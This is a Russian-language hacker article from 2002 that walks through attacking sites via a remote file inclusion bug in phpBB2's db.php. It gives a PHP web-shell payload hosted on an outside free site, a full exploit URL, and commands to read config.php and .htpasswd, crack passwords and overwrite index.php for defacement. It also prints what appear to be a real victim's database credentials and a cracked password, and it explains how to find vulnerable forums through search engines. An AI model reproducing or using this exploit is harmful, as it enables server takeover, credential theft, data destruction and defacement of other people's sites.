[ Взлом сайтов через phpBB2 BuG. ]
Date: 24.08.02
Здарова всем!
Сегодня я расскажу вам как пользоваться одним из самых распространенных багов
на сегодняшний день для взлома сайтов. Почему он такой известный, спросите вы,
да потому, что использует уязвимость в одном из самы (если не самом) красивом
форуме, написанном на PHP, да, я про phpBB2. Если вовремя пропатчить этот форум
или подписаться на багтрак для него, то никаких проблем не будет, и phpBB2
станет прекрасным украшением для вашего интернет-проекта.
Но многие люди пренебрегают вопросом безопасности и, соответственно, поплатятся за
это. Это вопрос времени. Все равно рано или поздно и до них доберутся.
Тогда они потеряют не только форум, но и все содержимое своего сайта :-)
Суть дела...
Баг обнаружен в скрипте db.php.
Если внимательно посмотреть на следующее место
"full_forum_path/includes/db.php?phpbb_root_path=full_script_path", где
full_forum_path - это полный путь к форуму, например, http://www.victim.org/phpBB2/, а
full_script_path - это полный путь к скрипту.
Теперь заменим скрипт на свой и укажем его месторасположение.
Идем на бесплатный хостинг и регистрируем там сайт. Сам сай нам не нужен. Нужно немного места.
Создаем в корневом каталоге папку db и кладем туда файл mysql.txt ос следующим содержанием:
<?php echo "<pre>"; system($cmd); echo
"</pre>"; ?>
Файлик берем здесь.
Так что можете им воспользоваться, пока сайтик не прикрыли.
Использование бага...
www.victim.org/phpBB2/includes/db.php?phpbb_root_path=http://yoursite.narod.ru/&dbms=mysql&phpEx=txt&cmd=cat%20../config.php
Выдаст:
Fatal error: Cannot instantiate non-existent class: sql_db in /home/uscgapa/uscgaparents-www/phpBB2/includes/db.php on line 55
Открываем сорс и видим:
===================================================
<pre><?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql";
$dbhost = "localhost";
$dbname = "uscgaparents_org";
$dbuser = "uscgapa";
$dbpasswd = "spartina";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?><br>
Fatal error: Cannot instantiate non-existent class: sql_db in /home/uscgapa/uscgaparents-www/phpBB2/includes/db.php on line 55
===================================================
Ага, наш подставной скриптик дал о себе знать.
Отсюда мы видим данные, необходимые для подключения к базе данных. Соответственно, присоединившись
к этой базе можно поиметь всю находящююся там инфу.
ls ../ -al - никсовая команда, показывающая содержимое каталога с флагом -al (показать с параметрами).
cat - просмотр содержимого текстового файла (мы использовали для просмотра config.php).
Идем дальше...
Больше я не буду таскать всю конструкцию за собой, длинная больно.
Тогда, конструкции вида
cmd=ls%20../../%20-al
cmd=ls%20../../../%20-al
cmd=ls%20../../../../%20-al
cmd=ls%20../../../../../%20-al
cmd=ls%20../../../../../../%20-al
позволят нам подняться на несколько уровней выше.
Но за нужным ходить далеко не надо
cat%20../../.htpasswd - выдаст нам файлик с паролями в виде
Debil:Mrd4OyzXJi/.o
Да, это никсовые пароли. Запускаем JTR и продолжаем исследовать дальше.
К примеру, чтобы перейти в каталог admin, необходимо ввести
cmd=ls%20../../admin/%20-al и так далее.
Таким образом можно исследовать весь сервер на наличие полезных материалов, исходников
скриптов и т.п.
Но что это :-) JTR расшифровал пароль.
Debil:anne3
Сервак полностью наш. Делаем с ним, что хотим. Хоть дефейс, хоть стирай все нафиг.
А что есль не расшифровал?
В поисках по серверу мы нашли главную страницу сайта, предположим это index.php
cmd=echo%20'Hacked by {dr}{nerve}'%20>%20../../index.php - даст нам дефейс плайн-текстом.
Для того, чтобы сделать красивый дефейс надо слепить картинку в Фотошопе, положить ее
на все тот же бесплатный хостинг и создать файл, который будет содержать одну строчку:
<body background="http://mzfk1.narod.ru/hacked.jpg">
Только при использовании echo надо поставить / перед > и <.
Как найти форумы с данным багом. А очень просто. Забиваем в
Yandex.ru, Altavista.ru, Rambler.ru и т.п. "phpBB2", жмем пимпу поиска
и получаем кучу сайтов на блюдичке с голубой каемочкой.
Удачного вам хака!
{dr}{NerVe} [KODSWEB]
!!! Статья является собственностью команды KODSWEB !!!
!!! Любое распространение без нашего разрешения строго запрешено !!!
|
